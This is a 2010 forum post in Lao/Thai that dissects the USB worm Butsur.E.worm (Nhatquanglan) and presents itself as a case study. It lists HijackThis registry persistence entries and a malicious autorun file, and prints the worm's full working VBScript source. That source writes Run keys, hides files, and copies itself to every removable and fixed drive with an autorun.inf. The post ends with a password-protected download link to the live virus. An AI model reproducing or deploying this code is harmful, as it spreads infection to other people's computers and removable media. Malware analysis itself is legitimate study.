SOUKPHATHAI


SOUKPHATHAI
 
บ้านຜ່າເບິ່ງຕັບໄຕໄສ້ພຸ້ງຂອງ Butsur.E.worm,Nhatquanglan Fo10ค้นหาสมัครสมาชิก(Register)เข้าสู่ระบบ(Log in)
Welcome to our forums!->BE ACTIVE AND RESPECT OTHERS!

Share
 

 ຜ່າເບິ່ງຕັບໄຕໄສ້ພຸ້ງຂອງ Butsur.E.worm,Nhatquanglan

Go down 
ผู้ตั้งข้อความ
SOUKPHATHAI
Admin
SOUKPHATHAI

Posts : 160
ເງີນ : 12307
ຄວາມດີ : 0
Join date : 22/03/2010
Age : 29

Character sheet
RAY:

ຜ່າເບິ່ງຕັບໄຕໄສ້ພຸ້ງຂອງ Butsur.E.worm,Nhatquanglan Empty
ตั้งหัวข้อเรื่อง: ຜ່າເບິ່ງຕັບໄຕໄສ້ພຸ້ງຂອງ Butsur.E.worm,Nhatquanglan   ຜ່າເບິ່ງຕັບໄຕໄສ້ພຸ້ງຂອງ Butsur.E.worm,Nhatquanglan EmptyTue Mar 30, 2010 1:26 am

ຜ່າເບິ່ງຕັບໄຕໄສ້ພຸ້ງຂອງ Butsur.E.worm,Nhatquanglan


ທຳອິດວ່າຊິບໍ່ມາ Post ໄວ້ທີ່ນີ້, ກະວ່າຈະເອົາໄປໄວ້ຫ້ອງ Special ເໝືອນດັ່ງເຄີຍ ເພາະຢ້ານເດັກນ້ອຍເອົາໄປໃຊ້ໃນທາງບໍ່ດີ... ແຕ່ເພື່ອເປັນການສຶກສາ, ກໍ່ເລີຍເອົາມາໄວ້ນີ້ຊະ ເພື່ອຜູ້ທີ່ຕ້ອງການຮຽນຮູ້ຈະໄດ້ນຳໄປເປັນກໍລະນີສຶກສາ

ຈາກ hijackthis ສະເພາະສ່ວນຂອງ Virus
Running processes:

F2 - REG:system.ini: Shell=Explorer.exe SCVHSOT.exe
O4 - HKLM\..\Run: [ACER-C96B16762D] C:\WINDOWS\SYSTEM32\ACER-C96B16762D.vbs
O4 - HKLM\..\Run: [winboot] wscript.exe /E:vbs C:\WINDOWS\boot.ini
O4 - HKLM\..\Run: [MGT_reg] C:\WINDOWS\.MGT_reg32.dll.vbs
O4 - HKLM\..\Run: [MS32DLL] \.MGT_reg32.dll.vbs
O4 - HKCU\..\Run: [protect_autorun] G:\Scan Virus\CPE17@KMUTT-Anti-Autorun.exe /start <---ລົງໄວ້ກໍ່ຊ່ວຍບໍ່ໄດ້ ເນື່ງຈາກ Virus ໃຊ້ File AUTORUN.FCB ແທນ autorun.inf
O4 - HKCU\..\Run: [Yahoo Messengger] C:\WINDOWS\system32\SCVHSOT.exe
O4 - HKUS\S-1-5-18\..\Run: [Yahoo Messengger] C:\WINDOWS\system32\SCVHSOT.exe (User 'SYSTEM')
O7 - HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegedit=1



AUTORUN.FCB
[autorun]
shellexecute=wscript.exe .MGT_reg32.dll.vbs




.MGT_reg32.dll.vbs
'marker
'slow and silent (sas)1.0
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,cc,hm
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe .MGT_reg32.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
set rg = createobject("WScript.Shell")
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout","0"
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL",winpath&"\.MGT_reg32.dll.vbs"
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\winboot","wscript.exe "&winpath&"\boot.ini"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun",0,"REG_DWORD"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden",1,"REG_DWORD"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden",0,"REG_DWORD"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt","1"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden","1"
dim text,size
size = mf.size
set text=mf.openastextstream(1,-2)
cc = text.readline
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\.MGT_reg32.dll.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\.MGT_reg32.dll.vbs",2,true)
tf.write "'ker"&vbcrlf&mysource
tf.close
set tf = fs.getfile(winpath & "\.MGT_reg32.dll.vbs")
tf.attributes = 39
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\boot.ini")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\boot.ini",2,true)
tf.write "'ker"&vbcrlf&mysource
tf.close
set tf = fs.getfile(winpath & "\boot.ini")
tf.attributes = 39
if cc = "'mark" then
rg.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname
end if
if cc = "'marker" then
rg.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname
end if
do
for each flashdrive in fs.drives
hm="'mark"
If (flashdrive.drivetype=1 or flashdrive.drivetype=2) and flashdrive.path <> "A:" then
if(flashdrive.drivetype=2) then
hm = "'marker"
end if
set tf=fs.getfile(flashdrive.path &"\.MGT_reg32.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\.MGT_reg32.dll.vbs",2,true)
tf.write hm&vbcrlf&mysource
tf.close
set tf=fs.getfile(flashdrive.path &"\.MGT_reg32.dll.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout","0"
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MGT_reg",winpath&"\.MGT_reg32.dll.vbs"
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\winboot","wscript.exe /E:vbs "&winpath&"\boot.ini"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun",0,"REG_DWORD"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden",1,"REG_DWORD"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden",0,"REG_DWORD"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt","1"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden","1"
next
if cc <> "'mark" then
Wscript.sleep 10000
end if
loop while cc <> "'mark"

Download Virus ເພື່ອການສຶກສາ

http://file.citecclub.org/download.php?id=04B6EE57

pass:virus
ขึ้นไปข้างบน Go down
http://soukphathai.forumlo.com
 
ຜ່າເບິ່ງຕັບໄຕໄສ້ພຸ້ງຂອງ Butsur.E.worm,Nhatquanglan
ขึ้นไปข้างบน 
หน้า 1 จาก 1

Permissions in this forum:คุณไม่สามารถพิมพ์ตอบ
SOUKPHATHAI :: DEVELOPER ZONE :: Virus-
ไปที่: